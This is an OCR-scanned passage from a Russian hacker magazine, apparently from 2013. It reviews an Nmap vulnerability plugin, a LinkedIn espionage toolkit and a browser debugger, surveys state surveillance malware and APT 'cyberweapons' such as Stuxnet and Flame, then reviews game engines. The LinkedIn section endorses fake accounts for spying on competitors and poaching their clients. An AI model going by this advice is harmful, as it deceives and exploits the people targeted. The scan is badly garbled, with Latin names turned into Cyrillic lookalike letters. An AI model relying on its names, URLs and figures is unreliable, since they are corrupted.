культовый сканер Итар. Далее проверяем, какие 
версии программного обеспечения использу- 
ются. И тут начинается гугление, яндексование, 
бинтование и прочее. В общем, муторная и скуч- 
ная работа, не интересная ни одному пентесте- 
ру. Куда эффективнее было бы это все вынести 
на первую стадию — рекогносцировку... 

Прошу любить и жаловать — плагин для ІМтар 
под названием Ѵыізсап, который трансформиру- 
ет Мтар в сканер уязвимостей. Принцип работы 
данного плагина крутится вокруг опции Ытар -зѴ, 
которая отвечает за определение версии серви- 
са. Узнав используемую версию, он лезет в свои 
популярные оГГПпе базы уязвимостей и смотрит, 
какие уязвимости присутствуют в данной версии. 
На данный момент используются базы: 

• зсір.сІі/еп/?ѵиІсІЬ; 

• сѵе.тііте.огд; 

• озѵбЬ.огд (ои!с!а!есІ, 02/03/2011 ); 

• зесигі!у!осиз.сот/ЬісІ; 

• зесипіа.сот/абѵі50ПѲ5/Ні5І:огіс; 

• 5Ѳсигі!у!гаскег.согп. 

Данные базы представлены в виде СЗѴ- 
файлов. Для обновления базы данных уязвимо- 
стей необходимо скачать новую версию (зсір. 
сіуѵиІсШ/зсірѵиісІЬ.сзѵ), Для запуска плагина не- 
обходимо скопировать его в директорию 1\1тар\ 
5сгір1:5\ѵиІ5сап\* и запустить ГЧтар с дополни- 
тельным параметром --5сгірі:=ѵиІ5сап. 

Также хочется сказать о наличии интерактив- 
ного режима, который позволяет переопределять 
результаты детектора версий для каждого порта. 



КОРПОРАТИВНЫЙ ШПИОНАЖ 

Знакомьтесь, ЕіпкесІІп КІер!о — инструмент для 
проведения шпионских кампаний по социальной 
инженерии в одной из самых популярных соци- 
альных сетей Еіпкебіп (эта сеть предназначена 
для поиска и установления деловых контактов, 
В настоящее время в ней зарегистрировано свы- 
ше 225 миллионов пользователей). 

Выбор ЕіпкесІІп очевиден — это единствен- 
ная соцсеть, где очень много информации 
как об организациях, так и о ее работниках. 
Из размещенных резюме порой можно выце- 
пить много интересных сведений: текущие за- 
дачи компании, направление развития, клиенты 
компании и так далее. 

Для работы с инструментом надо создать 
поддельный аккаунт и связаться с торговыми 
представителями конкурентов. Далее КІеріо 
будет мониторить деятельность и новые связи 
конкурентов. Также она будет пытаться выявлять 
новых потенциальных клиентов с использовани- 
ем специального инструмента анализа данных. 
На основании этой информации становится воз- 
можным уводить клиентов у конкурентов. 
Особенности шпионского тулкита: 

• автоматическое создание егпаіі и поддельно- 
го аккаунта; 

• повышение интереса к вашему профилю; 

• автоматическая рассылка приглашения; 

• мониторинг деятельности выбранных про- 
филей. 

Программа для управления имеет удобный 
веб-интерфейс и полностью написана на ПыЬу. 
Инструмент впервые был официально представ- 
лен на конференциях В5А 2013 и Віаск На! 2013 
АгзепаІ. 

Р. 3. Добавьте меня в друзья :). 



ОТЛАДЧИК В БРАУЗЕРЕ 

В последнее время в мире геѵегзе епдіпеегіпд 
активно разрабатываются визуализация иссле- 
дуемых данных, отображение процесса выпол- 
нения программы — в общем, все, что связано 
с удобством восприятия при исследовании про- 
граммы. 

Зачастую для РЕ используется отладчик, и то, 
как он отображает процесс работы программы, 
очень важно. Сейчас ситуация такова, что отлад- 
чиков много, все они отличаются и настроить III не 
всегда представляется возможным. 

ЗсНеггЮВС представляет собой интерфейс 
между отладчиком, который является фронтен- 
дом, и бэкендом, который фокусируется на от- 
ладке файлов без доступа к исходному коду. 
ЗсЬепгЮВС ставит своей целью отображать/пре- 
доставлять как можно больше информации в лю- 
бой точке отлаживаемой программы: 

* Метогу ѵіеѵѵ; 

* Ведіз!ег ѵіеѵѵ; 

* 3!аск ѵіеѵѵ; 

* Сосіе ѵіеѵѵ; 

* Ехргеззіоп Ѵіеѵѵ. 

На текущий момент в качестве фронтенда 
поддерживаются СЮВ -сервер и Ріп. Каждый 
из них для 32- и 64-битных бинарных файлов, 
запущенных на машине с ІІЬипШ в качестве хо- 
стовой машины. К сожалению, тестирование Ріп, 
запущенного на ѴѴІпсІоѵѵз, не проводилось, но сам 
модуль Ріп там работает, так что, в принципе, 
должно быть все в порядке. 

Отладчики управляются с помощью обертки, 
написанной на ЙиЬу, а веб-фронтенд написан 
на Со!!ее5спрі. Фронтенд корректно работа- 
ет под СМготіит (поддержка других браузеров 
не планируется). 
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Маіѵіаге 




Летом 2012 года сотрудники антивирусной ла- 
боратории Касперского обнаружили вредонос, 
получивший название Могсиі Его применили 
к группе независимых журналистов из Марок- 
ко, освещавших события в ходе «арабской вес- 
ны», — их компьютеры заражали целенаправлен- 
но через сервис электронной почты. 

В классификации других антивирусных ком- 
паний вредонос имеет наименование Сгізіз 
(Зутапіес) и ОаѴіпсі (Рг.ѴѴеЪ). В ходе проведен- 
ного компанией йг.ѴѴеЬ расследования было 
установлено, что Могсиі; является компонентом 
системы удаленного контроля ОаѴіпсі, которую 
разрабатывает и продает компания Наскіпд 
Теат. 



Система ОаѴіпсі позиционируется разработ- 
чиком как СОРМ (система технических средств 
для обеспечения функций оперативно-разыск- 
ных мероприятий) для использования правитель- 
ственными структурами и правоохранительными 
органами. Кроме компании Наскіпд Теат, подоб- 
ные СОРМ разрабатывает ряд других компаний. 
Как правило, это комплекс программ, состоя- 



щий из управляющего сервера и клиента-агента. 
Агент незаметно для пользователя устанавлива- 
ется на компьютер и имеет следующие функции: 
поиск и формирование списка файлов, удов- 
летворяющих заданным критериям; 
отправка произвольных файлов, в том числе 
электронных документов, на удаленный сер- 
вер; 

* перехват паролей от сервисов электронной 
почты и социальных сетей; 

* сбор данных о посещаемых ресурсах сети 
Интернет; 

* перехват потока данных систем электронной 
голосовой связи (Зкуре); 

* перехват данных систем мгновенного обмена 
сообщениями (ІСО); 

* сбор информации о контактах с мобильных 
телефонов, подключаемых к компьютеру; 

* запись аудио- и видеоинформации (при нали- 
чии подключенных веб-камеры и микрофона). 

Поданным издания ѴѴаІІ ЗігееЫоигпаІ, ряд ев- 
ропейских компаний поставляли СОРМ на базе 
СПО с таким функционалом в страны Ближнего 
Востока, правительства которых использовали 
их для борьбы с оппозиционно настроенными 
слоями населения. 
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Показатели распространенности таіѵѵаге 



Неправительственная организация Ргіѵасу 
Іпіегпаііопаі (Великобритания), занимающаяся 
выявлением фактов нарушения прав человека, 
проводит постоянный мониторинг международ- 
ного рынка СОРМ и ведет перечень компаний — 
разрабо пиков решений в этой сфере. Перечень 
составляется на основе анализа компаний — 
участников специализированной конференции 
155 ѴѴогІсІ (Іпіеііідепсе Зиррогі 5уз1ет5 — систе- 
мы обеспечения сбора информации). На этом 
мероприятии, которое проводится регулярно 
несколько раз в год, встречаются потенциальные 
покупатели и разработчики СОРМ. 

Вот некоторые из компаний, разрабатываю- 
щих вредоносы под видом СОРМ. 



По некоторым данным, после отставки Хосни 
Мубарака после событий 2011 года в Египте 
были найдены документы (см. рис. 3, 4), ука- 
зывающие на то, что компания РіпРізИег предо- 
ставляла услуги по слежению за гражданами 
Египта при помощи комплекса РіпЗру. Факт про- 
дажи пятимесячной лицензии режиму Мубарака 
в Египет за 287 тысяч евро компания упорно от- 
рицает. РіпЗру способен перехватывать теле- 
фонные звонки Зкуре, красть пароли и записы- 
вать аудиовидеоинформацию. На компьютеры 
пользователей РіпЗру устанавливается так: че- 
рез электронную почту отправляется сообщение 
со ссылкой на вредоносный сайт. Когда пользо- 
ватель откроет ссылку, ему предложат обновить 
программное обеспечение. На самом деле вме- 
сто обновления будет установлен зловред. Спо- 
соб распространения РіпЗру через электронную 
почту был отмечен летом 2012 года в отношении 
продемократических активистов Бахрейна. 

Разработчик системы удаленного контроля 
ОаѴіпсі, которую позиционируют как средство 
слежения, предназначенное для использования 
правительствами и правоохранительными орга- 
нами различных государств. Функционал ОаѴіпсі 
аналогичен РіпЗру — это перехват Зкуре, элек- 
тронных писем, паролей, данных средств мгно- 
венных сообщений (ІСО), а также запись аудио- 
видеоинформации. Клиентская часть ОаѴіпсі 
способна функционировать как в среде опера- 
ционных систем семейства ѴѴіпсІоѵѵз (версии ХР, 
Ѵізіа, Зеѵеп), так и в среде операционных систем 
семейства Мае 05 (версии Зпоѵѵ І_еорагсІ, І_іоп). 
Цена системы ОаѴіпсі предположительно со- 



ставляет около 200 тысяч евро, в нее заложены 
обязательства постоянно обновлять и поддер- 
живать продукт до того момента, пока конечная 
цель атаки (получение нужной информации) 
не будет достигнута. 

В ноябре 2011 года стало известно, что сотруд- 
ники этой компании установили систему мони- 
торинга для сирийского правительства, способ- 
ную перехватывать, сканировать и сохранять 
практически все сообщения электронной почты 
в стране. Через месяц после выявления этого 
факта ЕС запретил экспорт технических средств 
наблюдения в Сирию и их обслуживание. Систе- 
ма была развернута на основе договора с си- 
рийской телекоммуникационной компанией ЗТЕ 
(Зугіап Теіесотппипісаііопз ЕзІаЫізІтпепІ:), явля- 
ющейся основным оператором стационарной 
связи в Сирии. Для установки применялся спо- 
соб, эффективный при наличии доступа к теле- 
коммуникационным сетям (спецслужбы государ- 
ства и правоохранительные органы имеют такой 
доступ), — подмена информации. Например, 
пользователь при поиске информации в доодіе. 
сот получал ссылки, ведущие на вредоносный 
сайт, и заражался под видом установки компо- 
нентов браузера, необходимых для корректного 
отображения содержимого сайта. 



Журналисты ѴѴаІІ Зігееі: Зоигпаі в одном из остав- 
ленных сторонниками Каддафи центров интер- 



нет-мониторинга в Триполи (Ливия) обнаружили 
использование системы слежения компании 
Атезуз. По их свидетельствам, ливийские власти 
могли читать электронную почту, получать паро- 
ли, читать мгновенные сообщения и составлять 
карты связей между людьми. Документы, выло- 
женные на ресурсе \№кіІ_еакз, показали, что си- 
стема, развернутая Атезуз, позволяла следить 
за диссидентами и оппозиционерами даже за ру- 
бежом, например живущими в Великобритании. 

Трояны, использованные в ходе кибератак в 2013 
году, в основном уже не представляли собой 
ничего из ряда вон выходящего. Если 2012 год 
стал для «Лаборатории Касперского» годом пи- 
ара на теме ИИесИ-кибероружия, то в 2013 году 
появился новый тренд — использование в це- 
левых атаках широко распространенных вредо- 
носных программ, в противовес явно написан- 
ным командой профессионалов под конкретные 
цели. И все чаще отдельные признаки указывают 
на таких возможных организаторов атак, как Ки- 
тай и Северная Корея. Таким образом, можно 
говорить о так называемых «западной» и «азиат- 
ской школах» написания троянов, используемых 
для проведения атак класса АРТ. 

Что характерно для «западной школы»? 

1 . Вкладываются значительные финансовые 
ресурсы. 

2. Вредоносный код подписывают цифровой 
подписью легальных контор, сертифика- 
ты для нее обычно крадутся с взломанных 
серверов, что требует определенной под- 



ПРОБЛЕМЫ ТЕРМИНОЛОГИИ 
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Показатели распространенности АРТ 



сервера, а также извлекать файлы с локальных 
РТР-серверов в сети. 



Написан на ассемблере, что в наше время уже 
вызывает удивление (видать, вербанули кого- 
то старой школы). Адреса командных серверов 
берутся из Тѵѵіііег. Если с Тѵѵіиег не срослось, ис- 
пользовался Ооодіе Зѳагсб, чтобы найти зашиф- 
рованные ссылки к новым серверам управления. 

Китайские кибергруппировки пытаются не от- 
ставать от прогресса, и, например, такой троян, 
как ѴѴіппІі, используемый для атак на компании, 
занимающиеся компьютерными онлайн-играми, 
содержит в себе подписанные драйверы. 



готовительной работы, людских ресурсов 
и в конечном итоге пункта номер 1 . Подпись 
позволяет без проблем устанавливать драй- 
веры для перехода в режим ядра, что дает 
возможность реализовывать руткит-функ- 
ции, а также в ряде случаев обходить защиту 
антивирусных средств. 

3. Широко используются гего-сіау-уязвимости 
для скрытого запуска и повышения своих 
привилегий в системе, такие уязвимости сто- 
ят немало, так что опять смотри пункт 1 . 

С 2010 года были обнаружены следующие 
вредоносные программы с броским ярлыком 
«кибероружие» (см. рис. 2), в этой статье мы 
не будем расписывать их подвиги полностью — 
мы это уже делали ранее, — а просто пройдемся 
по их самым интересным особенностям. 



Выделяется на общем фоне тем, что он пока 
единственный представитель малвари, способ- 
ный физически повредить некоторые объек- 
ты предприятия. Так что к классу кибероружия 
фактически можно отнести только его. Что в нем 
было еще интересного — четыре гего-бау- 
уязвимости, распространение на ЕІЗВ не через 
тривиальный аіЛошп.іпІ, а через уязвимость об- 
работки ярлыков М310-046. При автозагрузке 
с флешки через вредоносный ярлык срабаты- 
вал руткит- компонент, после чего вредоносные 
компоненты Зіихпеі, размещенные на ІІЗВ Яазб, 
становились невидны. Имел функции червя, 
как у Сопіщкег (М508-067), а также метод рас- 
пространения по сети через уязвимость подси- 
стемы печати (М310-061). Драйверы были под- 
писаны украденными сертификатами. 



В качестве контейнера для доставки использовал- 
ся документ ѴѴогсІ (запуск через уязвимость в об- 
работке шрифтов М311-087, гего-бау), адресно 
отправляемый по электронной почте. Драйверы, 
как и у Зіихпеі:, были подписаны, чем до сих пор 
некоторые антивирусные аналитики пытаются 
обосновать связь между Зіихпеі: и Оиди. 



Интересен тем, что подпись компонентов при- 
надлежит Місгозоіі, создана она путем подбора 
коллизии М05. Нереально большой размер ис- 
ходника, около 20 Мб, использование значитель- 
ного количества стороннего кода. Есть модуль, 
который использует ВІиеІооЫі для перехвата ин- 
формации с мобильных устройств. 



Имеет модульную структуру, модулям при- 
своены имена знаменитых математиков, таких 



как Гёдель, Гаусс, Лагранж. Использует съем- 
ный носитель для хранения собранной инфор- 
мации в скрытом файле (это позволяет инфор- 
мации утекать через защитный периметр, где 
нет интернета, на флешке). Содержит плагины, 
предназначенные для кражи и мониторинга дан- 
ных, пересылаемых пользователями несколь- 
ких ливанских банков — Вапк о? Веігиі, ЕВІ_Р, 
ВІотВапк, ВуЫозВапк, РгапзаВапк и Сгебіі 
□Ьапаіз. 



Смежный с РІате проект. В ходе анализа ко- 
мандных серверов РІате было установлено, 
что существовали четыре разных типа клиентов 
(«вредоносных программ») под кодовыми назва- 
ниями 5Р, 8РЕ, РІ_ и ІР. МіпіРІате соответствует 
названию ЗРЕ, РІате, соответственно, — РЕ. 
Вредоносы с названиями 5Р и ІР так и не были 
обнаружены іп ІІіе ѵѵіісі. 



Способен красть данные с мобильных устройств, 
собирать информацию с сетевого оборудования 
(Сізсо) и файлы с 1)ЗВ-дисков (включая ранее 
удаленные файлы, для чего использует соб- 
ственную технологию восстановления файлов), 
красть почтовые базы данных из локального 
хранилища ОиНоок или с удаленного РОР/ІМАР- 
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Ценник на РіпЗру 



• Июль 2012 — Мабі; 

• август 2012 — ЗНатооп; 

• ноябрь 2012 — Ыагііат. 

Все они написаны на ОеІрИі (Іатеѵѵаге :)), 
код особенной технологичностью не блещет, 
о гего-бау и подписях нечего и говорить. Нали- 
цо использование пабли к технологий и методов. 
Но тем не менее — они работают! Кстати, трояны 
с деструктивными функциями на волне АРТ-атак 
опять входят в моду, ЗИатооп и ІМагіІат как раз 
из их числа. Они использовались, чтобы пара- 
лизовать работу отдельных организаций путем 
уничтожения информации на ЭВМ. 



Интернетизация, компьютеризация и прочая 
глобализация облегчили жизнь людям. И нам 
с тобой, и тем, которые раньше должны были 
прыгать с парашютом, перегрызать колючую 
проволоку, подслушивать, подсматривать, под- 
рывать и подкупать. Большую долю работы этих 
крепких парней сейчас делают талантливые про- 
граммисты за смешные по меркам соответству- 
ющих бюджетов миллионы долларов. Да, кстати, 
жизнь криминальным личностям, которые рань- 
ше должны были бегать с кольтом за почтовыми 
дилижансами, облегчилась тоже. Будь внимате- 
лен и осторожен! ЭС 
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Обзор самых популярных 
движков для разработки игр 

Компьютеров, ноутбуков, приставок, планше- 
тов и смартфонов у людей стало дико много. 
Их вычислительные возможности огромны, 
но используются они вовсе не для того, чтобы 
рассчитать траекторию полета к альфе Цен- 
тавра, отыскать лекарство от рака или способ 
накормить всех голодающих. Да, на всем 
этом вычислительном барахле люди просто 
играют. Поэтому сегодня речь пойдет о тех- 
нологиях, ставших незаменимыми при разра- 
ботке игр. Можно, конечно, написать движок 
с нуля самому, но это займет неоправданно 
много времени. Пока ты точишь его под кон- 
кретный проект, не факт, что к финалу раз- 
работки жанр, а то и целая отрасль индустрии 
не устареют. Поэтому рационально использо- 
вать готовый движок. 




НЕМНОГО ИСТОРИИ 

Не волнуйся: дальше последних 10-15 лет я углубляться не буду. Я бы рад, 
конечно, пофилософствовать о былых временах, но редактор будет против 
(отстаньте вы уже от меня, я же не виноват, что журнал бумажный. — Прим, 
ред.). 

Итак, еще 15 лет назад кодовая база для игр создавалась с нуля вну- 
три компаний — разработчиков определенных продуктов. Немного позже 
(примерно в середине первого десятилетия XXI века) вслед за разработ- 
кой других компонентов игр, таких как арт или звук, создание движков вы- 
шло на аутсорсинг — выделилось в отдельную индустрию. Происходило 
это постепенно. Стоит отметить, что и в девяностые были игры на готовых 
движках (ОООМ и Оиаке от ісі Зоііѵѵаге), но это было редким исключением 
от опередивших свое время дяденек, а правилом стало только в середине 
нулевых. Во многом из-за дороговизны движков, А когда сформировалась 
обособленная кодовая индустрия, бизнес приобрел другой вид, появились 
движки широкой ценовой категории. Сначала рынок заполнился инструмен- 
тами разработчиков — фреймворками, представляющими собой скорее 
графические движки, нежели игровые, отличающиеся от последних нали- 
чием лишь прослойки над графическим АРІ и отсутствием внутриигровых 
редакторов: средств для Іеѵеі- модели нга, импорта объектов, текстурирова- 
ния, загрузки и анимации персонажей. В качестве примера можно привести 
Одге, ОагкСЮК (много лет назад я писал о нем), НОЕ. Позже на рынок вышли 
другие, более прокачанные игроки, предложившие разработчикам полно- 
ценные движки: Тогцие 30, Ііпііу 30, ІІОК. 

Одновременно с появлением полноценного рынка движков, в индустрии 
наметился отток геймеров от синглплеерных к мульти плеерным онлайно- 





вым играм. Результатом этого стало появление движков вроде НегоЕпдіпе 
и ВідѴѴогісІ. 

Вслед за социальными сетями произошел всплеск интереса к веб- 
играм. На него разработчики движков отреагировали довольно оперативно, 
предоставив своим пользователям возможность запускать игры в браузере, 
установив плагин. Конечные пользователи в браузере получили игры, по ка- 
честву почти ничем не уступающие клиентским. С популярностью веб-игр 
большее распространение получила РІазИ -технология, в результате чего 
скромная Масготесііа (разработчик РІазР) была приобретена могуществен- 
ным АбоЬе, А на базе РІазИ стали появляться не только игры, но и движки 
для их разработки. Хорошим примером служит движок АІІегпаІіѵа от отече- 
ственной компании АІІегпаііѵа РІаІІогт. 

Затем случились мобильные технологии. Как гром среди ясного неба 
появились мобильные девайсы, по мощности сопоставимые с ПК сред- 
ней ценовой категории и способные потянуть крутые игровые приложения 
со всеми спецэффектами, которыми обладали низкоуровневые графиче- 
ские интерфейсы. На этот факт разработчики игровых движков ответили 
кто созданием специализированных конверторов, создающих нативный 
для конкретного оборудования код (например, Ііпііу 30), а кто — адаптацией 
своих продуктов к кросс-платформенности (к примеру, Тогцие 20). 

Также на рынке появились новые игроки, предлагающие кросс- 
платформенные фреймворки для всего парка мобильных устройств, не тре- 
бующие при этом даже перекомпиляции и выполняющиеся со скоростью 
нативного кода. Среди подобных средств можно отметить Согопа 50К, 
Магтаіасіе ЗРК, АОК (Арр Сате Кіі). 
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ІОІ 



УН И В ЕРСАЛ ЬН Ы Е ДВИЖКИ 



ипііузо 

Сайт: упііуЗсі.сопп 

Цена: іпбіе-версия: ігее, рго-версия: 1500 
долларов 

Порог вхождения: низкий 
Исходный код: закрытый 

Самый популярный движок для создания 20* и 30-игр. Бесспорно, он стал 
лидером индустрии, и, как только появляется новая игровая/графическая 
технология, разработчики незамедлительно реализуют ее в Ііпііу. Кроме 
разработки сингл плеерных игр для РС, посредством подключаемых экспор- 
теров можно портировать игры под другие ОС, консоли и мобильные техно- 
логии (за экспортер придется доплатить 1500 долларов за каждую платфор- 
му: Ю5, АпбгоІсІ, ВІаскВеггу). Плюс к этому образовалась целая индустрия, 
работающая над созданием дополнений и расширений движка, среди них 
есть как специализированные серверные решения для Упііу (например, 



Рбоіоп — полноценный игровой сервер), так и средства для разработки 
пользовательского интерфейса (N01)1), конструкторы, предназначенные 
для создания игр определенных жанров (например, РІаутакег). 

У самого редактора Ііпііу есть порты под 08 X и ѴѴіпсІоѵ/з, при этом изна- 
чально он был предназначен для 05 X, В Ііпііу включена поддержка РігесіХ 
11, что открывает твоим приложениям дорогу в миры ѴѴіпсІоѵѵз 8 и ѴѴіпсІоѵѵз 
Рбопе 8. Во время написания статьи вышла очередная версия Ііпііу под но- 
мером 4.2, в которой появилась поддержка последней на данный момент 
Ореп(31_ Е8 3.0, пока этими средствами обладают только топовые Апбгоісі- 
смартфоны. Движок Ііпііу особенно ценен за низкий порог вхождения 
для начинающих юзеров, благодаря этому, а также тому, что инди-версия 
бесплатна, вокруг движка организовалось огромное сообщество. Низкий 
порог вхождения является результатом грамотного дизайна приложения: 
многие вещи можно выполнить с помощью различных редакторов, не напи- 
сав при этом ни строчки кода (если что, код пишется на Заѵабсгірі, С#, Воо). 
Исходный код на С/С++ закрыт, но это в связи с расширенной компонентной 
структурой движка не создает никаких преград. 




Тогцие 20/30 

Сайт: іез.сот 

Цена: ігее (лицензия МІТ) 

Порог вхождения: средний 
Исходный код: открытый 

Несомненно, мой любимый игровой движок, Был в свое время лидером, 
но под натиском Ьіпііу утратил свои позиции. Тем не менее до сих пор 
на нем разрабатывается множество успешных проектов, поскольку он ак- 
тивно развивается сообществом. Не так давно я посвятил трехмерной вер- 
сии целую статью в нашем журнале, поэтому сейчас я обращу твое внима- 
ние на Тощие 20. 

Различия между двумерной и трехмерной версиями весьма значитель- 
ны, но есть и общие элементы, например развитая сетевая подсистема. 
После выхода в мир Ореп Зоигсе ТЗй сохранил и даже увеличил свои воз- 
можности, а Т20, напротив, многое потерял. Например, он утратил абсо- 
лютно все встроенные редакторы, которые, очевидно, были изъяты из-за 
определенных юридических соглашений. Зато на нем можно разрабатывать 
игры для трех платформ: ѴѴіпсІоѵѵз, 08 X и, что самое интересное, і05 (и про- 
давать игры в Арр Зіоге, не отчисляя ни копейки авторам движка). Весь дви- 
жок — это одна кодовая база на С++ без дополнительных экспортеров. Во 
время написания статьи в сообществе разработчиков Т20 кипела работа 
над созданием компилируемой версии для Апсігоісі и реинкарнацией этих 
самых «потерянных» редакторов. Текущей стабильной версией является 
2.0. Как видно, фундаментальные различия 20- и 30-версий заключают- 
ся в графической подсистеме: Т20 для визуализации использует ОрепСЦ 
а ТЗО — ОігесіХ, притом еще пока девятой версии, что преграждает создан- 
ным с его помощью играм путь в ѴѴіпсІоѵѵз Зіоге. Есть куда развиваться! 

В качестве скриптового языка в Т20, как и в ТЗО, используется Тощие 
Зсгірі. Вместе с тем в Т20 для описания игровых элементов служит ХМІ_- 
подобный язык ТАМІ_. Он позволяет определить свойства объектов на ста- 
дии инициализации уровня игры. Для воспроизведения звуков Т20 исполь- 
зует библиотеку ОрепАС Симуляция физики осуществляется посредством 
движка Вох20, ставшего стандартом в двумерных физических исчислени- 
ях. Несмотря на то что в двумерном Торке еще пока нет конструктора 0111, 
с помощью средств движка (в скриптовом коде) можно создавать пользо- 
вательский интерфейс привычными компонентами, а не простыми спрайта- 



ми. Однако, если нужный компонент отсутствует, его можно создать на ос- 
нове спрайтов. Имея аналогичную с 30-версией сетевую систему, на Т20 
можно разрабатывать мультиплеерные игры, которые набирают популяр- 
ность, — например Р2Р с планшетов. Вместе с Т20 поставляется коллек- 
ция из огромного количества сэмплов, которая «дружно» укомплектована 
в 8апбЬох. В каждом примере раскрывается определенная фича движка, 
а наличие исходного кода позволяет узнать ее устройство. 

У семейства движков от СагадеСатез тоже есть комьюнити, которое 
делает полезные для остального сообщества вещи: создаются туториалы 
и мануалы, решаются проблемы — все, как принято при социализме. Есть 
и платные инструменты: система ИИ, разнообразные улучшения и эффекты 
графической системы, арт, встраиваемые редакторы — диалогов, инвента- 
ря, тѳррейнов, источников света. 




Рис. 1 .ТгискТоу — сэмпл на Тощие 2Р 





СгуЕпдіпеЗ 

Сайт: гпѵс гѵепсііпе.согп 

Цена: ігее для некоммерческого 
использования (изучения и «домаш- 
них» разработок) 

Порог вхождения: средний 
Исходный код: закрытый 



СгуЕпдіпе 3 берет начало своей истории в 2001 году, когда была анонси- 
рована первая разрабатываемая на нем игра Раг Сгу. С тех пор много воды 
утекло, и текущая — на данный момент третья — последняя версия была 
выпущена в октябре 2009-го. Разработчики этого движка с самого нача- 
ла преследовали цель не самим создавать на нем игры, а продавать его 
как технологию. Следовательно, все разрабатываемые Сгуіек’ом игровые 
приложения — это «игра мышцами» с целью сделать дополнительную ре- 
кламу своему главному продукту. Хотя для изучения он доступен бесплатно, 
чтобы разрабатывать на нем коммерческие проекты, необходимо заплатить, 
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причем цена публично не объявляется. В итоге лицензиат получает движок, 
документацию (обучающие материалы), исходный код, а также оператив- 
ную поддержку. Кроме того, процесс лицензирования движка таит в себе 
множество подводных камней — хотя бы то, что лицензировать его может 
только юридическое лицо, которое должно предоставить данные о разрабо- 
танных продуктах и в отдельных случаях обо всех своих сотрудниках. 

В отличие от предыдущих движков линейки (которые были исключи- 
тельно РС-ориентированными), СгуЕпдіпе 3 ориентирован на создание 
кросс-платформенных игр, предназначенных для РС и консолей. В насто- 
ящее время поддерживаются платформы ХЬох 360, ХЬох Опе, Ріаубіаііоп 
3-4, ѴѴіііі, а также технологии визуализации настольной ѴѴіпсІоѵѵз — ОігесІХ 
9-11. Как можно заметить, поддержки мобильных платформ нет. В нем из- 
начально присутствует поддержка глобальных мул ьтипл верных (ММО) игр. 
СгуЕпдіпе 3 обладает ошеломляющим списком технологий визуализации, 
вот некоторые из них: динамическое освещение и затенение в реальном 
времени, затуманивание, Теггаіп 2.50, карты нормалей и параллакс-мап- 
пинг, подповерхностное рассеивание, световые лучи и волны, управление 
уровнем детализации ландшафта, а также многое другое. Самое интерес- 
ное, что СгуЕпдіпе по своим возможностям опережает текущую версию 
ОігесІХ, то есть, к примеру, СгуЕпдіпе 2 (в игре Сгузіз ѴѴагбеасІ), визуализи- 
руя через йігесІХЭ, выдавал эффекты от ОігесІХ 10. А третья версия движка, 
работая под ОігесІХ 10, выдавала эффекты, ставшие доступными широко- 
му кругу разработчиков только в йігесІХ 11 . Физический компонент движка 
СгуРНузісз также работает независимо от физических АР1, таких как РРузХ. 
Встроенная система анимации предлагает несколько отличных подсистем: 
индивидуализация персонажей, параметрическая скелетная анимация, 
процедурное деформирование движения. Также заслуживает отдельного 
внимания встроенная система ИИ, которая позволяет обрабатывать по- 
ведение не только персонажей, но и транспортных средств. Она состоит 
из трех модулей: умные объекты, алгоритмы динамического обнаружения 



пути, а также система, управляемая сценариями. В отсутствие лицензии, 
соответственно, при отсутствии исходного С++ кода ты будешь рулить 
движком с помощью скриптового языка Ціа, который благодаря гибкости 
прекрасно подходит для встраивания в игровые движки, Да и при наличии 
исходника многие задачи проще решить скриптовым языком — это, кстати, 
справедливо для всех движков. 




Рис. 2. ЗапсІЬох в СгуЕпдіпе 3 




ЦОК ( ІІпгеаІ ОеѵеІортепІ Кіі) 

Сайт: ипгеаіепдіпе.согті/исік 

Цена: ^гее 

Порог вхождения: средний 
Исходный код: закрытый 



Прямой наследник движка, использующегося в одном из первых реально 
успешных командных шутеров. Тогда, еще в конце прошлого века, были вы- 
пущены ІІпгеаІ и более успешный ІІпгеаІ Тоигпатепі. Собственно, ІЮК по- 
строен на основе ІІпгеаІ Епдіпе 3 и использует всю мощь последнего. 

ІЮК — это бесплатная версия движка ІІЕЗ, обладающая всем унаследо- 
ванным инструментарием последнего для создания игровых миров. Спи- 
сок поддерживаемых платформ не настолько широк, как у ІІпііу, но этого 
вполне хватает, чтобы окупить разработку: ѴѴіпсІоѵѵз РС, ѴѴіпсІоѵѵз Зіоге, 03 
X, ЮЗ, АпсІгоісІ и консоли предпоследнего поколения. 

Для скриптинга в движке используется собственный язык — ЫпгеаІЗспрі 
На сайте разработчиков представлены тонны обучающих материалов, 
как текстовых, так и видео, как по редактору, так и по скриптингу. ІІЕЗ полу- 
чил множество наград на индустриальных мероприятиях, а также в кине- 



матографе и не раз становился лучшим игровым/графическим движком 
года. По сути, ІЮК отличается от ІІЕЗ только отсутствием исходного кода. 
На базе данного движка выпущено более 300 тайтлов! В их числе: Ѳеагз оі 
ѴѴаг 3, ВіоЗбоск ІпИпііе, 1_оз1: РІапеі 3, Тгапзіюгтегз: РаІІ оТ СуЬегДоп, Ваітап: 
Агкбат Азуіит, Мазз Е^есі 3 и многие другие. 

Теперь заглянем внутрь. Гибкая система анимации позволяет контро- 
лировать каждую деталь анимируемого объекта. Анимационная модель 
контролируется системой АпітТгее, которая включает следующие меха- 
низмы: контроллер смешения (ВІепр), контроллер, управляемый данными, 
физические, процедурно-скелетные контроллеры. Для импортирования 
объектов используется формат РВХ, ставший стандартом для экспорта мо- 
делей между редакторами. Для визуализации ІІЕЗ использует 64-битный 
цветной НЮН графический конвейер, осуществляющий гамма-коррекцию, 
размытие движущихся объектов, внешнюю окклюзию и другие эффекты 
постобработки. Движком поддерживаются все современные эффекты ос- 
вещения и технологии визуализации: нормализированные карты, параме- 
тризированное освещение по Фонгу, различные анизотропные эффекты 
и прочее. ІІЕЗ известен своей высоко оптимизированной сетевой архитек- 
турой, включающей поддержку онлайновых баталий для игр разных жан- 
ров. Он обладает множеством других средств, которые, если тебе интерес- 
но, ты сможешь узнать сам, ну а мы перейдем к следующей теме. 



НегоЕпдіпе 

Сайт: Иегоѳпдіпе.сот 

Цена: 99 долларов в год (заодно рабочее место) 

Порог вхождения: высокий 
Исходный код: закрытый 

Да-да, это тот самый движок, на котором разработана ошеломляющая 
ММОПРО 51:аг ѴѴагз: ТТіе ОІсІ ПериЫіс. История движка началась еще в кон- 
це девяностых, когда американская компания Зітиігопісз приступила к раз- 
работке ММ0ВР6 Него’з ^игпеу. Как показало время, с игрой у них ничего 
не получилось: многократные переносы даты и срывы выхода проекта. Одна- 
ко технология, на основе которой велась разработка, была высоко оценена 
внутри индустрии и на игровых мероприятиях, и движок был лицензирован 



несколькими студиями, в том числе ВіоѴѴаге. В итоге в 2010 году движок 
как самостоятельная технология был продан корпорации ІсІеа РаЬгік. В этом 
